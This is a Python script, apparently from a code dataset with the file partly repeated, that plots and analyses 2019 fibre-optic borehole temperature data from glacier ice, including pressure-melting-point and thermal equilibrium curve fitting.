extent = [0, 1, temp_min, temp_max])
ax1d.set_xticks([])
ax1d.set_yticks(np.arange(temp_min, temp_max, 0.025), minor=True)
ax1d.yaxis.set_label_position("right")
ax1d.yaxis.tick_right()
ax1d.tick_params(axis='y', which='minor')
#ax1d.set_ylabel(' ', fontsize= fs)
#^^^^^^^^^^^^^^^^^^^^^^^^^^
#temperature deviation (n)
n_min = -0.03 #minimum salt concentration for plotting
n_max = 0.03 #maximum salt concentration for plotting
n = pmp_dif_w_sol
ax1e.imshow(n, vmin=n_min, vmax=n_max, aspect='auto', cmap='viridis',
extent = [x_lims[0], x_lims[-1], bh_depth, 0])
#ax1e.contour(pmp_ind, levels=[0], colors='white', linewidths=1, aspect='auto',
# extent = [x_lims[0], x_lims[-1], 0, bh_depth])
ax1e.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'black', lw=0.75, linestyles='dashed')
ax1e.set_ylim([bh_depth, close_up_depth])
#ax11a.xaxis.set_tick_params(rotation=30)
ax1e.xaxis_date()
ax1e.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
ax1e.set_xlabel('Date (2019)', fontsize= fs)
days = mdates.DayLocator()
ax1e.xaxis.set_minor_locator(days)
#create salt concentration colorbar as seperate plot
cbar_plot4 = np.zeros((1000, 2))
cbar_plot4[:,0] = np.linspace(n_max, n_min, 1000)
cbar_plot4[:,1] = np.linspace(n_max, n_min, 1000)
im3 = ax1f.imshow(cbar_plot4, aspect='auto', cmap='viridis',
extent = [0, 1, n_min, n_max])
ax1f.set_xticks([])
#ax1f.set_yticks(np.arange(n_min, n_max, 1), minor=True)
ax1f.yaxis.set_label_position("right")
ax1f.yaxis.tick_right()
ax1f.tick_params(axis='y', which='minor')
f = mticker.ScalarFormatter(useOffset=False, useMathText=True)
#format = lambda x,pos : "${}$".format(f._formatSciNotation('%1.10e' % x))
#ax1f.yaxis.set_major_formatter(mticker.FuncFormatter(format))
#ax1f.set_ylabel('Salt concentration (mol/kg)', fontsize= fs)
ax1f.set_ylabel('\n ')
#^^^^^^^^^^^^^^^^^^^^
#text labels
fig1.text(0.01, 0.5, 'Depth (m)', va='center', rotation='vertical', fontsize = fs)
fig1.text(0.96, 0.40, 'Temperature ($^\circ$C)', va='center', rotation='vertical', fontsize = fs)
text1 = fig1.text(0.96, 0.135, 'Temperature\ndeviation ($^\circ$C)', va='center', rotation='vertical', fontsize = fs)
text1.set_multialignment('center')
#text2 = fig1.text(0.96, 0.15, 'Solute\nconcentration', va='center', rotation='vertical', fontsize = fs)
#text2.set_multialignment('center')
#fig1.savefig('figures/T_series.png', dpi=600, bbox_inches = 'tight', pad_inches = 0)
plt.show()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
#figure 5. 3 part profile plot (full, gradient, temperate zone close up) with rectangle cut outs
#EQUILIBRIUM ANALYSIS: FULL LOOP
#get time in seconds
t = ds_full.t.values
xdata = [float((t[i] - t[0])*(1e-9)) for i in range(len(t))]
xdata = np.array(xdata)
xdata = xdata - xdata[0] + 1 #add a second on to prevent 0 value
T_equib = T
#create empty arrays
ice_T_0 = np.squeeze(np.zeros([1, T.shape[0]]))
ice_T_0[:] = np.nan
RMSE_T_0 = np.squeeze(np.zeros([1, T.shape[0]]))
RMSE_T_0[:] = np.nan
#input params. This is a bit of an art, check the animated plot to come up with good values for the particular input
equib_start = 1 #index for start of steepest gradient hunt
equib_end = 20 #index for end of gradient hunt
grad_max_pos = 4 #so e.g.1 = start data from 1 after max gradient, -1 = 1 before max gradient etc.
#for loop for each depth
#for i in range(T_equib.shape[0]):
print('Running equilibrium loop..')
#y_equib = ds_full.z.isel(z = slice(equib_cut, 3766))
for i in range(equib_cut, 8300):
#analyse
ydata = T_equib[i,:]
#obtain gradient
ydata_grad = np.gradient(ydata)
grad_max = np.argmin(ydata_grad[equib_start:equib_end])
#calculate index from where to begin x and y data
exp_ind = grad_max + grad_max_pos - equib_start
#set x and y data for the loop
xdata_loop = xdata[exp_ind:]
ydata_loop = ydata[exp_ind:]
#run fitting model
popt, pcov = scipy.optimize.curve_fit(func, xdata_loop, ydata_loop, p0=(0,0,0))
#record temperature
ice_T_0[i] = popt[2]
#obtain residuals
Q = popt[0]
s = popt[1]
residuals = (ydata_loop - func(xdata_loop, Q, s, ice_T_0[i]))
RMSE_T_0[i] = np.sqrt(np.mean(residuals**2))
#plot values
y = ds_end.z.values
y_equib = ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start)).values
co_T1 = -17.9
co_T2 = -17.0
co_d1 = 200
co_d2 = 240
a = 0.5
#Clausius-Clapeyron calculation (seperate to figure 1 as easier to keep coords seperate)
p_ice = rho_ice*g*y*np.cos(np.deg2rad(slope))
T_pmp_cc = Ttr - ccc*(p_ice - ptr)
fig5, (ax5a, ax5b, ax5c) = plt.subplots(1,3)
fig5.set_size_inches(7.3,140/25.4)
fig5.subplots_adjust(wspace = 0.23)
T_mean_grad = np.gradient(ds_end.tmpw, ds_end.z)
ax5b.scatter(-0.0815, 105, color='orange')
ax5b.plot(T_mean_grad, y, lw = 0.25, label = 'Temperature gradient', color='k')
ax5b.invert_yaxis()
ax5b.set_xlim([-0.3, 0.3])
ax5b.set_ylim([bh_depth,0]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5b.set_xlabel("Temperature gradient ($^\circ$C m$^-1$)")
ax5b.locator_params(axis='x', nbins=6)
ax5b.grid(True)
ax5b.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
#ax5b.set_yticklabels([])
ax5a.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5a.fill_betweenx(y_equib, ice_T_0 + 0.5*RMSE_T_0, ice_T_0 - 0.5*RMSE_T_0, facecolor='k', alpha=0.8, edgecolor='r', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5a.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5a.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5a.scatter(x_scat, y_scat, s=20, facecolors='none', edgecolors='black', zorder=6, label='Thermistor data')
ax5a.invert_yaxis()
ax5a.set_xlim([-25, 2])
ax5a.set_ylim([bh_depth,0]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5a.set_xlabel("Temperature ($^\circ$C)")
ax5a.set_ylabel("Depth (m)")
ax5a.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax5a.grid(True)
rect1 = patch.Rectangle((co_T1, co_d2), co_T2 - co_T1, co_d1 - co_d2, linewidth=1, facecolor='none', edgecolor = 'k')
ax5a.add_patch(rect1)
rect2 = patch.Rectangle((-6, 880), 6.5, bh_depth - 880, linewidth=1, facecolor='none', edgecolor = 'k')
ax5a.add_patch(rect2)
ax5c.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5c.plot(ds_end.tmpw, y, lw=1, label='Temperature', zorder=3, color='k')
ax5c.scatter(av_T_doyle, y_scat, s=20, facecolors='none', edgecolors='black')
ax5c.errorbar(av_T_doyle, y_scat, xerr=std_T_doyle, linestyle='None', linewidth=1)
ax5c.invert_yaxis()
ax5c.set_xlim([-6, -0.5]) #orig = [-25, 2], temp zone = [-1.5, -0.5]quit()
ax5c.set_ylim([bh_depth, 880]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5c.plot(T_pmp_cc - T0, y, zorder=1, lw=1, label='T_pmp')
ax5c.set_xlabel("Temperature ($^\circ$C)")
ax5c.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
ax5c.grid(True)
#rect3 = patch.Rectangle((-0.95, bh_depth - 85), 0.3, bh_depth - 85, linewidth=1, facecolor='none', edgecolor = 'k')
#ax5c.add_patch(rect3)
#cut out
xspacing = 0.1
yspacing = 5
minorlocatorx = MultipleLocator(xspacing)
majorlocatory = MultipleLocator(yspacing)
ax5d = fig5.add_axes([0.225, 0.46, 0.1, 0.21])
ax5d.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5d.fill_betweenx(y_equib, ice_T_0 + 0.5*RMSE_T_0, ice_T_0 - 0.5*RMSE_T_0, facecolor='k', alpha=a, edgecolor='r', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5d.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5d.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5d.invert_yaxis()
ax5d.set_xlim([co_T1, co_T2])
ax5d.set_ylim([co_d2,co_d1]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5d.xaxis.set_minor_locator(minorlocatorx)
#ax5d.yaxis.set_minor_locator(majorlocatory)
ax5d.grid(which='major')
ax5d.grid(which='minor')
ax5e = fig5.add_axes([0.73, 0.15, 0.1, 0.43])
ax5e.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
ax5e.plot(ice_T_0, y_equib, lw=0.5, color='r')
ax5e.plot(ds_end.tmpw, y, lw = 0.5, label = 'Mean Temperature', color='k')
ax5e.scatter(av_T_doyle, y_scat, s=20, facecolors='none', edgecolors='black')
ax5e.errorbar(av_T_doyle, y_scat, xerr=std_T_doyle, linestyle='None', linewidth=1)
ax5e.invert_yaxis()
ax5e.plot(T_pmp_cc - T0, y, zorder=1, lw=1, label='T_pmp')
ax5e.set_xlim([-0.95, -0.65])
ax5e.set_ylim([bh_depth, bh_depth - 85]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5e.xaxis.set_minor_locator(minorlocatorx)
ax5e.yaxis.set_minor_locator(majorlocatory)
ax5e.grid(which='major')
ax5e.grid(which='minor')
#fig5.savefig('figures/T_profile_mean4.png', dpi=600, bbox_inches = 'tight', format = 'png')
plt.show()
#plt.close('all')
#save outdatacd
data_out = np.column_stack((y, ds_end.tmpw))
#np.savetxt('results/T_profile.txt', data_out)
#clausius clapeyron calculation for each time step
sys.exit()
y_2 = ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start)).values #introducing second y cut to region of interest
#for loop to run over area within temperate zone and calculate clausius clapeyron slope and goodness of fit
#create output array
rms_out = np.zeros(len(t)) #store root mean square error
r2_out = np.zeros(len(t)) #r squared value
cc_out = np.zeros(len(t)) #store Clausius Clapeyron
#get index where passes inferred CTZ
t_zone_top = [ n for n,i in enumerate(y_2) if i>982 ][0]
for i in range(len(t)):
#prepare regression inputs
#t_zone_top = min([j for j, x in enumerate(pmp_ind[:,i]) if x])
#print(t_zone_top)
T_full = np.squeeze(T[:,i])
t_zone_ind = np.squeeze(pmp_ind[:,i])
T_t_zone = T_full[t_zone_top:]
y_t_zone = y_2[t_zone_top:]
#perform regression
#m = slope, A0 = intercept
ymin, ymax = min(y_t_zone), max(y_t_zone)
pfit, stats = Polynomial.fit(y_t_zone, T_t_zone, 1, full=True, window=(ymin, ymax),
domain=(ymin, ymax))
#print('Raw fit results:', pfit, stats, sep='\n')
A0, m = pfit
resid, rank, sing_val, rcond = stats
rms = np.sqrt(resid[0]/len(y_t_zone))
#perform R2 regressoin
slope, intercept, r_value, p_value, std_err = scipy.stats.linregress(y_t_zone, T_t_zone)
#print('Fit: T = {:.6f}m + {:.3f}'.format(m, A0),
# '(rms residual = {:.4f})'.format(rms))
#pylab.plot(T_t_zone, y_t_zone, 'o', color='k')
#pylab.plot(pfit(y_t_zone), y_t_zone, color='k')
#pylab.xlabel('Temperature $^{o}C$')
#pylab.ylabel('Depth (m)')
#plt.gca().invert_yaxis()
#pylab.show()
#save outputs
rms_out[i] = rms
r2_out[i] = r_value**2
cc_out[i] = m #convert from K m-1 to K MPa-1
plt.plot(t, -0.8 - 1043*cc_out)
plt.show()
plt.plot(t, (-cc_out/(rho_ice*g))*1e6)
#plt.plot(t, (rms_out/(rho_ice*g))*1e6)
plt.show()
plt.plot(t, r2_out)
plt.show()
#seperate plots
#t_zone_top = min([j for j, x in enumerate(pmp_ind[:,i]) if x])
#print(t_zone_top)
T_full = np.squeeze(T[:,120])
t_zone_ind = np.squeeze(pmp_ind[:,120])
T_t_zone = T_full[t_zone_top:]
y_t_zone = y_2[t_zone_top:]
#perform regression
#m = slope, A0 = intercept
ymin, ymax = min(y_t_zone), max(y_t_zone)
pfit, stats = Polynomial.fit(y_t_zone, T_t_zone, 1, full=True, window=(ymin, ymax),
domain=(ymin, ymax))
#print('Raw fit results:', pfit, stats, sep='\n')
A0, m = pfit
resid, rank, sing_val, rcond = stats
rms = np.sqrt(resid[0]/len(y_t_zone))
print('Fit: T = {:.6f}m + {:.3f}'.format(m, A0),
'(rms residual = {:.4f})'.format(rms))
pylab.plot(T_t_zone, y_t_zone, 'o', color='k')
pylab.plot(pfit(y_t_zone), y_t_zone, color='k')
pylab.xlabel('Temperature $^{o}C$')
pylab.ylabel('Depth (m)')
plt.gca().invert_yaxis()
pylab.show()
| 39.386404 | 194 | 0.692692 | #script to plot results from 1_full_process.py
#science advances figure guidelines. Preferably 2.5, 5.0, or 7.3 inches wide
#and no more than 11.0 inches high. Miminum line width of 0.5 pt. 9 pt and
#bold for e.g. A, B, C, etc.
#Robert Law, Scott Polar Research Institute, University of Cambridge, 2020. rl491@cam.ac.uk
import os
import sys
import glob
import scipy
import pylab
import seaborn
import datetime
import matplotlib
import numpy as np
import xarray as xr
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.patches as patch
import matplotlib.ticker as mticker
from matplotlib.ticker import MultipleLocator
Polynomial = np.polynomial.Polynomial
os.chdir(os.path.dirname(sys.argv[0]))
from T0_curve_fitting import fit_model, plot_model
#define functions
def func(x, Q, s, T_0):
k_i = 2.10; # [W m^-1 K^-1] Thermal conductivity of pure ice
# From Ryser et al. [2014, Thesis, p. 20]
return ((Q / (4 * np.pi * k_i)) * (1 / (x - s)) + T_0)
#inputs
file_path_end = 'processed_data/ch1_end_processed.nc'
file_path_full = 'processed_data/ch1_full_processed.nc'
plot_date = datetime.datetime(2019, 8, 14, 0, 0, 0) #date for plotting in datetime format
av_date = datetime.datetime(2019, 8, 10, 0, 0, 0) #date for averaging where in use. Takes average from av_date to plot_date
bh_depth = 1042.95 #(m) from Sam Doyle BH19c depth email thread
bh_depth_dts = 1062. #(m) BH19c depth from DTS with refractive index error
z_start = 204. #(m) z value where cable first enters ice (in non corrected distance)
fs = 8
close_up_depth = 970 #(m) depth for basal close up to begin from
CTZ_lower = 982 #(m) interpreted depth of bottom of the CTZ
max_T = 1 #(deg C) maximum temperature for image plot
min_T = -22 #(deg C) minimum temperature for image plot
pmp_allow = 0.0 #(K) how far to allow pmp away from calculated value to include in temperate zone #WHERE TO DEFINE THIS AS? 0.075 FOR FIGURE, BUT LOWER VALUE WORKS BETTER FOR ANLYSIS.
equib_cut = 35 #(ind) depth cut to remove top section where cooling is not clearly exponential
fail_depth = (1109.5 - z_start)*(bh_depth/bh_depth_dts) #(m) at which point did the cable fail?
#input params. This is a bit of an art, check the animated plot to come up with good values for the particular input
equib_start = 1 #index for start of steepest gradient hunt
equib_end = 20 #index for end of gradient hunt
grad_max_pos = 4 #so e.g.1 = start data from 1 after max gradient, -1 = 1 before max gradient etc.
#constants (i.e. things that definitely won't change unless some seriously strange shit happens)
T0 = 273.15 #(K) 0 degrees C in Kelvin
Ttr = 273.16 #(K) triple point temperature of water
ptr = 611.73 #(Pa) triple point pressure of water
g = 9.81 #(m/s^2) gravitational acceleration
Bs = 1.86 #(K kg mol^-1) constant for pmp calculations from Cuffey and Paterson following Lliboutry (1976)
#parameters (i.e. things that could change)
ccc = 9.14e-8 #(K/Pa) Clausius-Clapeyron constant
ccc2 = 9.14e-8 #(K/Pa) for water and solute load analysis. This value keeps the pmp line away from from the obvserved at all points
slope = 0.96 #(degrees) slope under borehole
rho_ice = 910. #(kg/m^3) ice density
#load datasets
ds_end = xr.open_dataset(file_path_end)
ds_full = xr.open_dataset(file_path_full)
#ds_end.tmpw.isel(t = -1).plot(linewidth = 0.7)
#plt.show()
print(ds_end)
print(ds_full)
sys.exit()
#correct depth
ds_end.z.values = (ds_end.z.values - z_start)*(bh_depth/bh_depth_dts)
ds_full.z.values = (ds_full.z.values - z_start)*(bh_depth/bh_depth_dts)
#extract useful part
#ds_end = ds_end.isel(t = -1)
#load data from Sam Doyle
Doyle_df = pd.read_csv('Doyle_data/analog_blue.csv')
Doyle_dt_val = Doyle_df.loc[:,'datetime'].values #datetime values
Doyle_dt_list = list(Doyle_dt_val) #datetime list
Doyle_dts = [datetime.datetime.strptime(x, r'%d/%m/%Y %H:%M') for x in Doyle_dt_list]
Doyle_dt_np = np.array(Doyle_dts) #into np array
#get plotting index
ind_date_Doyle = np.argmax(Doyle_dt_np > plot_date)
av_ind_date_Doyle = np.argmax(Doyle_dt_np > av_date)
#get T values from Doyle_df
T1 = Doyle_df.loc[ind_date_Doyle,"T1"]
T2 = Doyle_df.loc[ind_date_Doyle,"T2"]
T3 = Doyle_df.loc[ind_date_Doyle,"T3"]
T4 = Doyle_df.loc[ind_date_Doyle,"T4"]
T5 = Doyle_df.loc[ind_date_Doyle,"T5"]
T_doyle = np.array([T1, T2, T3, T4, T5])
#means
av_T1 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T1"])
av_T2 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T2"])
av_T3 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T3"])
av_T4 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T4"])
av_T5 = np.mean(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T5"])
av_T_doyle = np.array([av_T1, av_T2, av_T3, av_T4, av_T5])
#stds
std_T1 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T1"])
std_T2 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T2"])
std_T3 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T3"])
std_T4 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T4"])
std_T5 = np.std(Doyle_df.loc[av_ind_date_Doyle:ind_date_Doyle,"T5"])
std_T_doyle = np.array([std_T1, std_T2, std_T3, std_T4, std_T5])
#manualy input thermistor depths (T1:T5)
T_depths = np.array([0.28, 1, 3, 5.04, 10.05])
T_depths = bh_depth - T_depths
#set scatter coords
x_scat = T_doyle
y_scat = T_depths
#Clausius-Clapeyron calculation
p_ice = rho_ice*g*ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start))*np.cos(np.deg2rad(slope))
T_pmp_cc = Ttr - ccc*(p_ice - ptr)
T_pmp_cc_w_sol = Ttr - ccc2*(p_ice - ptr) #for water and solute load analysis
#obtain indicies
depth_ind = np.argmax(ds_end.z.values > bh_depth)
#start_ind = np.argmax(ds_end.z.values > z_start) - 1
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
#figure 1. Time series image plot with close ups for solute load and water content
#image plot
y = ds_full.z.values
T = ds_full.tmpw.sel(z = slice(0+z_start, bh_depth+z_start)).values
close_up_ind = np.argmax(y > close_up_depth)
temp_min = -0.85
temp_max = -0.75
#create image of temperate zone
pmp_cut = T_pmp_cc
pmp_cut_w_sol = T_pmp_cc_w_sol
pmp_im = np.zeros(np.shape(T)) #pmp image
pmp_im_w_sol = np.zeros(np.shape(T)) #pmp image for water and solute analysis
pmp_ind = np.zeros(pmp_im.shape[1])
for i in range(pmp_im.shape[1]):
pmp_im[:,i] = pmp_cut
pmp_im_w_sol[:,i] = pmp_cut_w_sol
pmp_im_w_sol = pmp_im_w_sol - T0 #w_sol means for water and solute analysis
pmp_im = pmp_im - pmp_allow - T0
#find where temperate zone is exceeded
pmp_dif = T - pmp_im
pmp_dif_w_sol = pmp_im_w_sol - T
pmp_ind = np.greater(pmp_dif, np.zeros(np.shape(T)))
matplotlib.rcParams.update({'font.size': fs})
x_lims = mdates.date2num(ds_full.t.values)
fig1 = plt.figure(figsize = (7.3,130/25.4), constrained_layout=True)
gs = fig1.add_gridspec(10,20)
ax1a = fig1.add_subplot(gs[:6,:-1]) #main image
ax1b = fig1.add_subplot(gs[:6,-1]) #T colorbar
ax1c = fig1.add_subplot(gs[6:8,:-1]) #close up temperate zone T
ax1d = fig1.add_subplot(gs[6:8,-1]) #T colorbar for close up
ax1e = fig1.add_subplot(gs[8:10,:-1]) #water content
ax1f = fig1.add_subplot(gs[8:10,-1]) #water content colourbar
#main image
ax1a.imshow(T, vmin=min_T, vmax=max_T, aspect='auto', cmap='viridis',
extent = [x_lims[0], x_lims[-1], bh_depth, 0])
ax1a.hlines(close_up_depth, x_lims[0], x_lims[-1], colors = 'r', lw=0.75, linestyles='dashed')
#print(T)
#ax1a.contour(T, levels = [-25, -20, -15, -10, -5, 0])
#ax1a.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'white', lw=0.8, linestyles='dashed')
#ax1a.contour( pmp_ind, levels=[0], colors='white', linewidths=0.75, aspect='auto',
# extent = [x_lims[0], x_lims[-1], 0, bh_depth])
ax1a_contours = ax1a.contour( T, levels=[-25, -20, -15, -10, -5, 0], colors='white', linewidths=0.75, aspect='auto',
extent = [x_lims[0], x_lims[-1], 0, bh_depth])
#ax1a.clabel(ax1a_contours, fontsize = fs)
#ax1a.set_ylim([bh_depth, 0])
#ax1a.xaxis.set_tick_params(rotation=30)
ax1a.xaxis_date()
ax1a.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
ax1a.set_ylabel(' ', fontsize= fs)
days = mdates.DayLocator()
ax1a.xaxis.set_minor_locator(days)
ax1a.set_xticklabels([])
#create T colorbar as seperate plot
cbar_plot1 = np.zeros((1000, 2))
cbar_plot1[:,0] = np.linspace(max_T, min_T, 1000)
cbar_plot1[:,1] = np.linspace(max_T, min_T, 1000)
im2 = ax1b.imshow( cbar_plot1, aspect='auto', cmap='viridis',
extent = [0, 1, min_T, max_T])
ax1b.set_xticks([])
ax1b.set_yticks(np.arange(min_T, max_T, 1), minor=True)
ax1b.yaxis.set_label_position("right")
ax1b.yaxis.tick_right()
ax1b.tick_params(axis='y', which='minor')
#ax1b.set_ylabel('Temperature ($^\circ$ C)')
#temp close up
ax1c.imshow(T, vmin=temp_min, vmax=temp_max, aspect='auto', cmap='viridis',
extent = [x_lims[0], x_lims[-1], bh_depth, 0])
#ax1c.contour(pmp_ind, levels=[0], colors='white', linewidths=1, aspect='auto',
# extent = [x_lims[0], x_lims[-1], 0, bh_depth])
ax1c.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'black', lw=0.75, linestyles='dashed')
ax1c.set_ylim([bh_depth, close_up_depth])
#ax1a.xaxis.set_tick_params(rotation=30)
ax1c.xaxis_date()
ax1c.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
days = mdates.DayLocator()
ax1c.xaxis.set_minor_locator(days)
ax1c.set_xticklabels([])
#create T colorbar as seperate plot
cbar_plot2 = np.zeros((1000, 2))
cbar_plot2[:,0] = np.linspace(temp_max, temp_min, 1000)
cbar_plot2[:,1] = np.linspace(temp_max, temp_min, 1000)
im3 = ax1d.imshow( cbar_plot2, aspect='auto', cmap='viridis',
extent = [0, 1, temp_min, temp_max])
ax1d.set_xticks([])
ax1d.set_yticks(np.arange(temp_min, temp_max, 0.025), minor=True)
ax1d.yaxis.set_label_position("right")
ax1d.yaxis.tick_right()
ax1d.tick_params(axis='y', which='minor')
#ax1d.set_ylabel(' ', fontsize= fs)
#^^^^^^^^^^^^^^^^^^^^^^^^^^
#temperature deviation (n)
n_min = -0.03 #minimum salt concentration for plotting
n_max = 0.03 #maximum salt concentration for plotting
n = pmp_dif_w_sol
ax1e.imshow(n, vmin=n_min, vmax=n_max, aspect='auto', cmap='viridis',
extent = [x_lims[0], x_lims[-1], bh_depth, 0])
#ax1e.contour(pmp_ind, levels=[0], colors='white', linewidths=1, aspect='auto',
# extent = [x_lims[0], x_lims[-1], 0, bh_depth])
ax1e.hlines(CTZ_lower, x_lims[0], x_lims[-1], colors = 'black', lw=0.75, linestyles='dashed')
ax1e.set_ylim([bh_depth, close_up_depth])
#ax11a.xaxis.set_tick_params(rotation=30)
ax1e.xaxis_date()
ax1e.xaxis.set_major_formatter(mdates.DateFormatter('%b %d'))
ax1e.set_xlabel('Date (2019)', fontsize= fs)
days = mdates.DayLocator()
ax1e.xaxis.set_minor_locator(days)
#create salt concentration colorbar as seperate plot
cbar_plot4 = np.zeros((1000, 2))
cbar_plot4[:,0] = np.linspace(n_max, n_min, 1000)
cbar_plot4[:,1] = np.linspace(n_max, n_min, 1000)
im3 = ax1f.imshow(cbar_plot4, aspect='auto', cmap='viridis',
extent = [0, 1, n_min, n_max])
ax1f.set_xticks([])
#ax1f.set_yticks(np.arange(n_min, n_max, 1), minor=True)
ax1f.yaxis.set_label_position("right")
ax1f.yaxis.tick_right()
ax1f.tick_params(axis='y', which='minor')
f = mticker.ScalarFormatter(useOffset=False, useMathText=True)
#format = lambda x,pos : "${}$".format(f._formatSciNotation('%1.10e' % x))
#ax1f.yaxis.set_major_formatter(mticker.FuncFormatter(format))
#ax1f.set_ylabel('Salt concentration (mol/kg)', fontsize= fs)
ax1f.set_ylabel('\n ')
#^^^^^^^^^^^^^^^^^^^^
#text labels
fig1.text(0.01, 0.5, 'Depth (m)', va='center', rotation='vertical', fontsize = fs)
fig1.text(0.96, 0.40, 'Temperature ($^\circ$C)', va='center', rotation='vertical', fontsize = fs)
text1 = fig1.text(0.96, 0.135, 'Temperature\ndeviation ($^\circ$C)', va='center', rotation='vertical', fontsize = fs)
text1.set_multialignment('center')
#text2 = fig1.text(0.96, 0.15, 'Solute\nconcentration', va='center', rotation='vertical', fontsize = fs)
#text2.set_multialignment('center')
#fig1.savefig('figures/T_series.png', dpi=600, bbox_inches = 'tight', pad_inches = 0)
plt.show()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
#figure 5. 3 part profile plot (full, gradient, temperate zone close up) with rectangle cut outs
#EQUILIBRIUM ANALYSIS: FULL LOOP
#get time in seconds
t = ds_full.t.values
xdata = [float((t[i] - t[0])*(1e-9)) for i in range(len(t))]
xdata = np.array(xdata)
xdata = xdata - xdata[0] + 1 #add a second on to prevent 0 value
T_equib = T
#create empty arrays
ice_T_0 = np.squeeze(np.zeros([1, T.shape[0]]))
ice_T_0[:] = np.nan
RMSE_T_0 = np.squeeze(np.zeros([1, T.shape[0]]))
RMSE_T_0[:] = np.nan
#input params. This is a bit of an art, check the animated plot to come up with good values for the particular input
equib_start = 1 #index for start of steepest gradient hunt
equib_end = 20 #index for end of gradient hunt
grad_max_pos = 4 #so e.g.1 = start data from 1 after max gradient, -1 = 1 before max gradient etc.
#for loop for each depth
#for i in range(T_equib.shape[0]):
print('Running equilibrium loop..')
#y_equib = ds_full.z.isel(z = slice(equib_cut, 3766))
for i in range(equib_cut, 8300):
#analyse
ydata = T_equib[i,:]
#obtain gradient
ydata_grad = np.gradient(ydata)
grad_max = np.argmin(ydata_grad[equib_start:equib_end])
#calculate index from where to begin x and y data
exp_ind = grad_max + grad_max_pos - equib_start
#set x and y data for the loop
xdata_loop = xdata[exp_ind:]
ydata_loop = ydata[exp_ind:]
#run fitting model
popt, pcov = scipy.optimize.curve_fit(func, xdata_loop, ydata_loop, p0=(0,0,0))
#record temperature
ice_T_0[i] = popt[2]
#obtain residuals
Q = popt[0]
s = popt[1]
residuals = (ydata_loop - func(xdata_loop, Q, s, ice_T_0[i]))
RMSE_T_0[i] = np.sqrt(np.mean(residuals**2))
#plot values
y = ds_end.z.values
y_equib = ds_full.z.sel(z = slice(0+z_start, bh_depth+z_start)).values
co_T1 = -17.9
co_T2 = -17.0
co_d1 = 200
co_d2 = 240
a = 0.5
#Clausius-Clapeyron calculation (seperate to figure 1 as easier to keep coords seperate)
p_ice = rho_ice*g*y*np.cos(np.deg2rad(slope))
T_pmp_cc = Ttr - ccc*(p_ice - ptr)
fig5, (ax5a, ax5b, ax5c) = plt.subplots(1,3)
fig5.set_size_inches(7.3,140/25.4)
fig5.subplots_adjust(wspace = 0.23)
T_mean_grad = np.gradient(ds_end.tmpw, ds_end.z)
ax5b.scatter(-0.0815, 105, color='orange')
ax5b.plot(T_mean_grad, y, lw = 0.25, label = 'Temperature gradient', color='k')
ax5b.invert_yaxis()
ax5b.set_xlim([-0.3, 0.3])
ax5b.set_ylim([bh_depth,0]) #orig = [total_depth,0], temp zone = [1300,1100]
ax5b.set_xlabel("Temperature gradient ($^\circ$C m$^-1$)")
ax5b.locator_params(axis='x', nbins=6)
ax5b.grid(True)
ax5b.axhline(y = fail_depth, xmin=0, xmax=1, lw = 0.7, linestyle='dashed', color='gray')
#ax5b.set_yticklabels([])
ax5a.fill_betweenx(y, ds_end.tmpw_25, ds_end.tmpw_975, facecolor='k', alpha=a, edgecolor='k', linewidth=0.0, label=r'95% confidence interval', zorder=4)
